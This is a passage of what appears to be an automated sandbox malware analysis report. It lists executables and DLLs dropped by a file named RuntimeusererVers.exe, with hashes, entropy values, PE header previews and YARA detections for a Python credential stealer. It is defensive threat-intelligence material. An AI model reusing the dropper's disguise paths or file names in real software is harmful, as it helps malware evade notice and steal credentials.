                                                                                                                                                                                                                                        MD5:B92F8EFB672C383AB60B971B3C6C87DE
                                                                                                                                                                                                                                        SHA1:ACB671089A01D7F1DB235719C52E6265DA0F708F
                                                                                                                                                                                                                                        SHA-256:B7376B5D729115A06B1CAB60B251DF3EFC3051EBBA31524EA82F0B8DB5A49A72
                                                                                                                                                                                                                                        SHA-512:680663D6C6CD7B9D63160C282F6D38724BD8B8144D15F430B28B417DDA0222BFFF7AFEFCB671E863D1B4002B154804B1C8AF2D8A28FFF11FA94972B207DF081B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........IT..'...'...'.......'..&...'...&...'.."...'..#...'..$...'.0.&...'...&...'.../...'...'...'.......'...%...'.Rich..'.........PE..d...#X.c.........." ...".Z...^......@^....................................................`.............................................d...T...d...............................L.......................................@............p...............................text....Y.......Z.................. ..`.rdata...+...p...,...^..............@..@.data...h#..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..L...........................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):143360
                                                                                                                                                                                                                                        Entropy (8bit):6.075135460374895
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:yYjAONgTgGNWARNEBXRzHJ0Xg9sGkD7EKN7Jv1FL/49olpS0mZP0c:nlTmsCD7Z7Jv19/49olY0m10c
                                                                                                                                                                                                                                        MD5:E611E5C516FE1C3670353E3427DA42B9
                                                                                                                                                                                                                                        SHA1:A946ABDEEBE7FA9CCD7AB256C927BE5902784E4A
                                                                                                                                                                                                                                        SHA-256:B4F41659DC3002F70BC6578801AAD771B45F106103441D1E9B4C553C1E50C939
                                                                                                                                                                                                                                        SHA-512:A1C057DBD4B618FDFDD75F70BFE85DBFC6D2A25FED8E74DD5FBF950A02D7470E1F4BFAC8ED00A5CDEF6A68B8737A156A5A0EA443E826C6B30C94554BD7326B99
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......V..X...........4....@......t.Z....@......@......@............Y.........~.....).........X..........Rich...........................PE..d....2 e.........." ................<.....................................................`.............................................\............`.......@...............p..`.......................................8............................................text...X........................... ..`.rdata..ho.......p..................@..@.data...h.... ......................@....pdata.......@......................@..@.rsrc........`.......(..............@..@.reloc..`....p.......*..............@..B........................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):199448
                                                                                                                                                                                                                                        Entropy (8bit):6.377510350928234
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:3072:OA1YT2Ga6xWK+RohrRoi9+IC08K9YSMJiCNi+GVwlijAOBgC4i9IPLhhHx:v1YOyGohNoEC08K9oJ5GWl7Fi
                                                                                                                                                                                                                                        MD5:9C21A5540FC572F75901820CF97245EC
                                                                                                                                                                                                                                        SHA1:09296F032A50DE7B398018F28EE8086DA915AEBD
                                                                                                                                                                                                                                        SHA-256:2FF8CD82E7CC255E219E7734498D2DEA0C65A5AB29DC8581240D40EB81246045
                                                                                                                                                                                                                                        SHA-512:4217268DB87EEC2F0A14B5881EDB3FDB8EFE7EA27D6DCBEE7602CA4997416C1130420F11167DAC7E781553F3611409FA37650B7C2B2D09F19DC190B17B410BA5
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........T..5.5.5.Mu..5..I.5..I.5..I.5..I.5..I.5..M.5.5..5..I.5..I.5..I...5..I.5.Rich.5.................PE..d......d.........." ..."............0........................................ .......=....`.............................................P................................/..........`3..T........................... 2..@............ ...............................text............................... ..`.rdata....... ......................@..@.data...@!..........................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67352
                                                                                                                                                                                                                                        Entropy (8bit):6.146621901948148
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:rw/EsYpkVgBaz57kcDA7QKFmpz7cnzH/ks/KF61xubwmB1Cf//yhC74JFmpktJSy:8/5k8cnzeJf9IPL037SyG3Px
                                                                                                                                                                                                                                        MD5:B711598FC3ED0FE4CF2C7F3E0877979E
                                                                                                                                                                                                                                        SHA1:299C799E5D697834AA2447D8A313588AB5C5E433
                                                                                                                                                                                                                                        SHA-256:520169AA6CF49D7EE724D1178DE1BE0E809E4BDCF671E06F3D422A0DD5FD294A
                                                                                                                                                                                                                                        SHA-512:B3D59EFF5E38CEF651C9603971BDE77BE7231EA8B7BDB444259390A8A9E452E107A0B6CB9CC93E37FD3B40AFB2BA9E67217D648BFCA52F7CDC4B60C7493B6B84
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......%{..a.e.a.e.a.e..fm.`.e..fe.`.e..f..`.e..fg.`.e.Richa.e.........................PE..d......d.........." ...".................................................................`.........................................`...P................................/..............T............................................................................rdata..............................@..@.rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):5762840
                                                                                                                                                                                                                                        Entropy (8bit):6.089392282930885
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:49152:73djosVvASxQKADxYBVD0NErnKqroleDkcWE/Q3pPITbwVFZL7VgVr42I1vJHH++:73ZOKRtlrJ7wfGrs1BHeM+2PocL2
                                                                                                                                                                                                                                        MD5:5A5DD7CAD8028097842B0AFEF45BFBCF
                                                                                                                                                                                                                                        SHA1:E247A2E460687C607253949C52AE2801FF35DC4A
                                                                                                                                                                                                                                        SHA-256:A811C7516F531F1515D10743AE78004DD627EBA0DC2D3BC0D2E033B2722043CE
                                                                                                                                                                                                                                        SHA-512:E6268E4FAD2CE3EF16B68298A57498E16F0262BF3531539AD013A66F72DF471569F94C6FCC48154B7C3049A3AD15CBFCBB6345DACB4F4ED7D528C74D589C9858
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......q.D.5.*.5.*.5.*.z.+.7.*.z...;.*.z./.9.*.z...=.*.z.).1.*.<../.*.~.+.>.*.5.+.P.*...'..*...*.4.*.....4.*...(.4.*.Rich5.*.........................PE..d......d.........." ...".X%..47.....\H........................................\.......X...`...........................................@......WA......p[.......V.d0....W../....[..C....).T.............................).@............p%..............................text...rV%......X%................. ..`.rdata.......p%......\%.............@..@.data.........A..L...hA.............@....pdata..d0....V..2....Q.............@..@PyRuntim......X.......S.............@....rsrc........p[......rV.............@..@.reloc...C....[..D...|V.............@..B........................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):30480
                                                                                                                                                                                                                                        Entropy (8bit):6.578957517354568
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:384:N1ecReJKrHqDUI7A700EZ9IPQGNHQIYiSy1pCQn1tPxh8E9VF0NykfF:3eUeJGHqNbD9IPQGR5YiSyvnnPxWEuN
                                                                                                                                                                                                                                        MD5:C97A587E19227D03A85E90A04D7937F6
                                                                                                                                                                                                                                        SHA1:463703CF1CAC4E2297B442654FC6169B70CFB9BF
                                                                                                                                                                                                                                        SHA-256:C4AA9A106381835CFB5F9BADFB9D77DF74338BC66E69183757A5A3774CCDACCF
                                                                                                                                                                                                                                        SHA-512:97784363F3B0B794D2F9FD6A2C862D64910C71591006A34EEDFF989ECCA669AC245B3DFE68EAA6DA621209A3AB61D36E9118EBB4BE4C0E72CE80FAB7B43BDE12
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........tB.t'B.t'B.t'K..'@.t'..u&@.t'..q&N.t'..p&J.t'..w&F.t'..u&@.t'B.u'..t'..u&G.t'..y&C.t'..t&C.t'...'C.t'..v&C.t'RichB.t'................PE..d......d.........." ...".....2............................................................`..........................................@..L...,A..x....p.......`.......H.../......L....3..T............................2..@............0...............................text............................... ..`.rdata.......0......................@..@.data........P.......6..............@....pdata.......`.......8..............@..@.rsrc........p.......<..............@..@.reloc..L............F..............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1504024
                                                                                                                                                                                                                                        Entropy (8bit):6.578962536427207
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:24576:85Cmr6e6a6Ias3yjWdQty0ok8k378UZk+ZfZ4Se6TOs9CedxnYhR2Au:81/uIasCjWdaHokXk+9Z4Se6TO4dFYL5
                                                                                                                                                                                                                                        MD5:08D50FD2B635972DC84A6FB6FC581C06
                                                                                                                                                                                                                                        SHA1:4BCFC96A1AAD74F7AB11596788ACB9A8D1126064
                                                                                                                                                                                                                                        SHA-256:BB5AC4945B43611C1821FA575AF3152B2937B4BC1A77531136780CC4A28F82E9
                                                                                                                                                                                                                                        SHA-512:8EC536E97D7265F007AD0F99FC8B9EECC9355A63F131B96E8A04E4BD38D3C72E3B80E36E4B1923548BD77EB417C5E0AC6A01D09AF23311784A328FBED3C41084
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......K3...R...R...R...*&..R..@....R..@....R..@....R..@....R..D*...R...R...R.......R.......R....J..R.......R..Rich.R..........................PE..d......d.........." ..."............................................................._....`.........................................Px...".............................../...........*..T............................(..@...............8............................text...x........................... ..`.rdata..............................@..@.data...PG.......>..................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):1141016
                                                                                                                                                                                                                                        Entropy (8bit):5.435086202175289
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:83kYbfjwR6nblonRiPDjRrO5184EPYPx++ZiLKGZ5KXyVH4eD1ol:8UYbMA0IDJcjEwPgPOG6Xyd461ol
                                                                                                                                                                                                                                        MD5:AA13EE6770452AF73828B55AF5CD1A32
                                                                                                                                                                                                                                        SHA1:C01ECE61C7623E36A834D8B3C660E7F28C91177E
                                                                                                                                                                                                                                        SHA-256:8FBED20E9225FF82132E97B4FEFBB5DDBC10C062D9E3F920A6616AB27BB5B0FB
                                                                                                                                                                                                                                        SHA-512:B2EEB9A7D4A32E91084FDAE302953AAC57388A5390F9404D8DFE5C4A8F66CA2AB73253CF5BA4CC55350D8306230DD1114A61E22C23F42FBCC5C0098046E97E0F
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............................................,...............,.....,.....,.y...,.....Rich..........PE..d......d.........." ...".@..........P*...............................................!....`.............................................X............`.......P..0....:.../...p.......]..T............................[..@............P..x............................text....>.......@.................. ..`.rdata.......P.......D..............@..@.data...H....0......................@....pdata..0....P.......&..............@..@.rsrc........`......................@..@.reloc.......p.......8..............@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):109392
                                                                                                                                                                                                                                        Entropy (8bit):6.641929675972235
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:GcghbEGyzXJZDWnEzWG9q4lVOiVgXjO5/woecbq8qZHg2zuCS+zuecL:GV3iC0h9q4v6XjKwoecbq8qBTq+1cL
                                                                                                                                                                                                                                        MD5:4585A96CC4EEF6AAFD5E27EA09147DC6
                                                                                                                                                                                                                                        SHA1:489CFFF1B19ABBEC98FDA26AC8958005E88DD0CB
                                                                                                                                                                                                                                        SHA-256:A8F950B4357EC12CFCCDDC9094CCA56A3D5244B95E09EA6E9A746489F2D58736
                                                                                                                                                                                                                                        SHA-512:D78260C66331FE3029D2CC1B41A5D002EC651F2E3BBF55076D65839B5E3C6297955AFD4D9AB8951FBDC9F929DBC65EB18B14B59BCE1F2994318564EB4920F286
                                                                                                                                                                                                                                        Malicious:false
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........u...u...u.E.t...u.....u...t...u..v...u..q...u..p...u..u...u......u..w...u.Rich..u.........PE..d..._#;..........." ...".....`......................................................=.....`A........................................`C..4....K...............p.......\..PO...........-..p............................,..@............................................text............................... ..`.rdata...A.......B..................@..@.data...0....`.......D..............@....pdata.......p.......H..............@..@_RDATA..\............T..............@..@.rsrc................V..............@..@.reloc...............Z..............@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):67072
                                                                                                                                                                                                                                        Entropy (8bit):5.872119413277649
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:768:0lC4VDCD5Pd8jeE9+d8cxIRJpyZVEqyaFtYpquFajBSsDJLSGg8fJwJ5ZRYuK5G:48Dv8qo+xIRyo+FtaFMBFDv7OJ543
                                                                                                                                                                                                                                        MD5:0EDC0F96B64523314788745FA2CC7DDD
                                                                                                                                                                                                                                        SHA1:555A0423CE66C8B0FA5EEA45CAAC08B317D27D68
                                                                                                                                                                                                                                        SHA-256:DB5B421E09BF2985FBE4EF5CDF39FC16E2FF0BF88534E8BA86C6B8093DA6413F
                                                                                                                                                                                                                                        SHA-512:BB0074169E1BD05691E1E39C2E3C8C5FAE3A68C04D851C70028452012BB9CB8D19E49CDFF34EFB72E962ED0A03D418DFBAD34B7C9AD032105CF5ACD311C1F713
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........I...'G..'G..'G...G..'G.&F..'G.&F..'G."F..'G.#F..'G.$F..'Gi.&F..'G..&G..'Gf./F..'Gf.'F..'Gf..G..'Gf.%F..'GRich..'G................PE..d...Y.Hd.........." ...".....................................................p............`.........................................0...d.......d....P.......@..<............`..........................................@............................................text.............................. ..`.rdata...6.......8..................@..@.data...(:..........................@....pdata..<....@......................@..@.rsrc........P......................@..@.reloc.......`......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):655360
                                                                                                                                                                                                                                        Entropy (8bit):6.429498330590438
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:Xs/doJlY/OBzRSxUlcUmNNuNkOFIj+fWT0hrHPPoX1yZcG7:mAuOBzRSxUlvFIj+fWIPPM1yZcg
                                                                                                                                                                                                                                        MD5:4327027D7CB61F547E22C4F668EB7BF7
                                                                                                                                                                                                                                        SHA1:22F413D03A90D04D571526687E43EB255F427435
                                                                                                                                                                                                                                        SHA-256:E681900AEB771E57BC063E44B303293E11DF32F1B1FECDCBC00574C00E75626C
                                                                                                                                                                                                                                        SHA-512:16A2E2E262C0246906D48EA67EE17D38C07712A1B97EB18C4F8F656F39EB187E18DA3EDC6D2FDF49DC9E35B92F6BA6BDE0F00948C3E68E146F7EDCD1E9C9404A
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$...........p...p...p....)..p..!....p.......p..!....p..!....p..!....p..G....p...p...p..G....p..G....p..G.E..p..G....p..Rich.p..........................PE..d...f.Ae.........." ...#.....`...............................................P............`.............................................\...........0..........|5...........@.......s..............................Pr..@...............8............................text............................... ..`.rdata..............................@..@.data...0...........................@....pdata..|5.......6..................@..@.rsrc........0......................@..@.reloc.......@......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\AppData\Local\Temp\XboxGameBar\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):524800
                                                                                                                                                                                                                                        Entropy (8bit):6.43361179692515
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:LhqzrH09USNNSNkUvpMnAp5Oqwj/k6OsoOfu/PYS/O51Y/H:LhqzrH0evpMnApu86OsynYUPv
                                                                                                                                                                                                                                        MD5:DC08F04C9E03452764B4E228FC38C60B
                                                                                                                                                                                                                                        SHA1:317BCC3F9C81E2FC81C86D5A24C59269A77E3824
                                                                                                                                                                                                                                        SHA-256:B990EFBDA8A50C49CD7FDE5894F3C8F3715CB850F8CC4C10BC03FD92E310260F
                                                                                                                                                                                                                                        SHA-512:FBC24DD36AF658CECE54BE14C1118AF5FDA4E7C5B99D22F99690A1FD625CC0E8AA41FD9ACCD1C74BB4B03D494B6C3571B24F2EE423AAAE9A5AD50ADC583C52F7
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$............t...t...t....:..t..S....t.......t..S....t..S....t..S....t..5....t...t..dt..5....t..5....t..5.V..t..5....t..Rich.t..........................PE..d...Z.Ae.........." ...#.....................................................@............`.............................................d...$........ ...........*...........0..d....k...............................j..@............... ............................text............................... ..`.rdata..............................@..@.data...(-.......(..................@....pdata...*.......,..................@..@.rsrc........ ......................@..@.reloc..d....0......................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):24189952
                                                                                                                                                                                                                                        Entropy (8bit):6.346346908201171
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:98304:CFUine3T2HszWM/LvOrN6hC0lxy6D5DKJBlZGODSr1YQaxLaIaiFrEF9o31g6d6T:lD+SWKOr4CeXDuHwODSw6uc
                                                                                                                                                                                                                                        MD5:D71750B08D81D33E6BEAD1CEB707BC4F
                                                                                                                                                                                                                                        SHA1:CEB0FE13317E7EF87377D385E9CF869343958971
                                                                                                                                                                                                                                        SHA-256:6D350FD6D807F267F5B615CF5937DABB99E5F30ED3B3310E1BF2AA2A34F93F8E
                                                                                                                                                                                                                                        SHA-512:9CDC43BCE53CC6B9A388B9FB50BF81DB413432BEB0B607D14942DB6CEDDCEEB38CBEB9896916BF73A72E06731D16755F20A475523BE63177996A3D9BCDD6FA0B
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Yara Hits:
                                                                                                                                                                                                                                        • Rule: JoeSecurity_GenericPythonStealer, Description: Yara detected Generic Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_PythonStealer, Description: Yara detected Python Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: C:\Users\user\AppData\Local\Temp\onefile_7988_133761375672850942\RuntimeusererVers.exe, Author: Joe Security
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.............................N..........0[.....0......0......0...................y....7.......7.....Rich...................PE..d...7s6g.........."....(.....X......0..........@..............................w...........`..................................................l..<.......8.......t;............w.(...PY...............................X..@............................................text.............................. ..`.rdata..............................@..@.data...............................@....pdata..t;.......<..."..............@..@.rsrc...8............^..............@..@.reloc..(.....w.......q.............@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):65304
                                                                                                                                                                                                                                        Entropy (8bit):6.186171767195339
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:a2icaMc9070S1Qx+gTKnEzBIPOnr07SyLLDPx:a2icrcj2Qx+gTOEzBIPOnYxXx
                                                                                                                                                                                                                                        MD5:79F71C92C850B2D0F5E39128A59054F1
                                                                                                                                                                                                                                        SHA1:A773E62FA5DF1373F08FEAA1FB8FA1B6D5246252
                                                                                                                                                                                                                                        SHA-256:0237739399DB629FDD94DE209F19AC3C8CD74D48BEBE40AD8EA6AC7556A51980
                                                                                                                                                                                                                                        SHA-512:3FDEF4C04E7D89D923182E3E48D4F3D866204E878ABCAACFF657256F054AEAFAFDD352B5A55EA3864A090D01169EC67B52C7F944E02247592417D78532CC5171
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$......../T..A...A...A.......A...@...A...D...A...E...A...B...A.~.@...A...@...A...@.2.A.~.L...A.~.A...A.~.....A.~.C...A.Rich..A.........PE..d......d.........." ...".R..........`.....................................................`.............................................P...`...d......................../..........`w..T........................... v..@............p...............................text....P.......R.................. ..`.rdata..~J...p...L...V..............@..@.data...............................@....pdata..............................@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):820736
                                                                                                                                                                                                                                        Entropy (8bit):6.056263694016779
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:12288:cY0Uu7wLsglBv4i5DGAqXMAHhlyL82XTw05nmZfR7o:cp0NA1tAmZfR
                                                                                                                                                                                                                                        MD5:D9FC15CAF72E5D7F9A09B675E309F71D
                                                                                                                                                                                                                                        SHA1:CD2B2465C04C713BC58D1C5DE5F8A2E13F900234
                                                                                                                                                                                                                                        SHA-256:1FCD75B03673904D9471EC03C0EF26978D25135A2026020E679174BDEF976DCF
                                                                                                                                                                                                                                        SHA-512:84F705D52BD3E50AC412C8DE4086C18100EAC33E716954FBCB3519F4225BE1F4E1C3643D5A777C76F7112FAE30CE428E0CE4C05180A52842DACB1F5514460006
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........ls...........u......q......u......q......q......q.....Yq...........Hp.....Hp.....Hp.....Hp.....Rich............................PE..d......d.........." ...#.@...H.......F....................................................`.........................................@c..`....c.......................................9..............................P8..@............P...............................text....?.......@.................. ..`.rdata.......P.......D..............@..@.data........p.......`..............@....pdata...............h..............@..@.rsrc...............................@..@.reloc..............................@..B................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
                                                                                                                                                                                                                                        Size (bytes):84760
                                                                                                                                                                                                                                        Entropy (8bit):6.570831353064175
                                                                                                                                                                                                                                        Encrypted:false
                                                                                                                                                                                                                                        SSDEEP:1536:PdQz7pZ3catNZTRGE51LOBK5bib8tsfYqpIPCV17SyQPx:VQz9Z5VOwiItsAqpIPCV1Gx
                                                                                                                                                                                                                                        MD5:3859239CED9A45399B967EBCE5A6BA23
                                                                                                                                                                                                                                        SHA1:6F8FF3DF90AC833C1EB69208DB462CDA8CA3F8D6
                                                                                                                                                                                                                                        SHA-256:A4DD883257A7ACE84F96BCC6CD59E22D843D0DB080606DEFAE32923FC712C75A
                                                                                                                                                                                                                                        SHA-512:030E5CE81E36BD55F69D55CBB8385820EB7C1F95342C1A32058F49ABEABB485B1C4A30877C07A56C9D909228E45A4196872E14DED4F87ADAA8B6AD97463E5C69
                                                                                                                                                                                                                                        Malicious:true
                                                                                                                                                                                                                                        Antivirus:
                                                                                                                                                                                                                                        • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                        Reputation:unknown
                                                                                                                                                                                                                                        Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A}...............d`.....J`......J`......J`......J`......J`.......`......Nd..........Z....`.......`.......`.......`......Rich............PE..d......d.........." ...".....^......L........................................P.......`....`.........................................p...H............0....... .. ......../...@..........T...........................p...@............................................text............................... ..`.rdata..L>.......@..................@..@.data...............................@....pdata.. .... ......................@..@.rsrc........0......................@..@.reloc.......@......................@..B........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                        Process:C:\Users\user\Desktop\RuntimeusererVers.exe
                                                                                                                                                                                                                                        File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                        Category:dropped
